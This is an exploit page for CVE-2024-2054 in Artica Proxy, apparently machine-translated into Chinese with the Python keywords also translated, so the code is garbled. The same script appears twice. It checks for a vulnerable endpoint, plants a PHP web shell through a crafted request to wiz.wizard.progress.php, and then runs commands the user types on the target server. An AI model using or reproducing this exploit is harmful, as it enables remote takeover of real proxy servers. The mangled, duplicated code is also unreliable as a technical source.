#利用标题: CVE-2024-2054 Artica-Proxy行政网络
应用程序不安全的挑战(RCE)
#Google Dork:
#日期: 23-04-2024
#利用作者: Madan
#供应商homepage: https://arica-proxy.com/
#版本: 4.40,4.50
#测试在: [相关操作系统]
#CVE : CVE-2024-2054
您还可以在我的github repo:上找到利用
导入请求
导入基础64
导入urllib3
从Colorama进口
print('URL格式EX: https://8X.3X.xx.xx.xx:9000端口9000可能
有时与Artica代理接口的托管方式不同')
url=输入('Enter url:')
如果URL [-1]=='/':
实际_url=url [:-1]
其他:
实际_url=url
artica_url=tuale_url
DEF检查(Artica_url):
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
TRY:
check=requests.get(artica_url+'/wizard/wiz.upload.php',verify=false)
除异常外,E:
打印(fore.red+'无法到达,检查URL')
如果check.status_code==200:
打印(fore.green+'弱者')
返回true
其他:
打印(fore.red+'不脆弱')
DEF漏洞利用(Artica_url):
有效载荷=base64.b64encode(b'?php system($ _ get ['cmd']);')。decode()
payload_data={
'tzoxotoitmv0x0x0rouzjfq2fjagvfrmlszsi': {
'cache_file':'/usr/share/artica-postfix/wizard/wiz.upload.php',
'cache_serializer':'json',
'cache_size': 99999999,
'cache_data': {
payload: {
'cache_date': 0,
'ttl': 999999999
}
}
}
}
而true:
payload_cmd=input('enter command:')
url=f'{artica_url}/wizard/wiz.wizard.progress.php?build-js={payload_data}'
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
响应=requests.get(url,verify=false)
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
if antsphy.status_code==200:
cmd_url=f'{artica_url}/wizard/wiz.upload.php?cmd={payload_cmd}'
cmd_response=requests.get(cmd_url,verify=false)
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
打印(cmd_response.text)
其他:
打印(“无法执行有效载荷”)
检查=检查(artica_url=muthate_url)
如果检查==true:
exploit(artica_url=artica_url)
应用程序不安全的挑战(RCE)
#Google Dork:
#日期: 23-04-2024
#利用作者: Madan
#供应商homepage: https://arica-proxy.com/
#版本: 4.40,4.50
#测试在: [相关操作系统]
#CVE : CVE-2024-2054
您还可以在我的github repo:上找到利用
正在加载...
github.com
导入基础64
导入urllib3
从Colorama进口
print('URL格式EX: https://8X.3X.xx.xx.xx:9000端口9000可能
有时与Artica代理接口的托管方式不同')
url=输入('Enter url:')
如果URL [-1]=='/':
实际_url=url [:-1]
其他:
实际_url=url
artica_url=tuale_url
DEF检查(Artica_url):
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
TRY:
check=requests.get(artica_url+'/wizard/wiz.upload.php',verify=false)
除异常外,E:
打印(fore.red+'无法到达,检查URL')
如果check.status_code==200:
打印(fore.green+'弱者')
返回true
其他:
打印(fore.red+'不脆弱')
DEF漏洞利用(Artica_url):
有效载荷=base64.b64encode(b'?php system($ _ get ['cmd']);')。decode()
payload_data={
'tzoxotoitmv0x0x0rouzjfq2fjagvfrmlszsi': {
'cache_file':'/usr/share/artica-postfix/wizard/wiz.upload.php',
'cache_serializer':'json',
'cache_size': 99999999,
'cache_data': {
payload: {
'cache_date': 0,
'ttl': 999999999
}
}
}
}
而true:
payload_cmd=input('enter command:')
url=f'{artica_url}/wizard/wiz.wizard.progress.php?build-js={payload_data}'
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
响应=requests.get(url,verify=false)
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
if antsphy.status_code==200:
cmd_url=f'{artica_url}/wizard/wiz.upload.php?cmd={payload_cmd}'
cmd_response=requests.get(cmd_url,verify=false)
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
打印(cmd_response.text)
其他:
打印(“无法执行有效载荷”)
检查=检查(artica_url=muthate_url)
如果检查==true:
exploit(artica_url=artica_url)
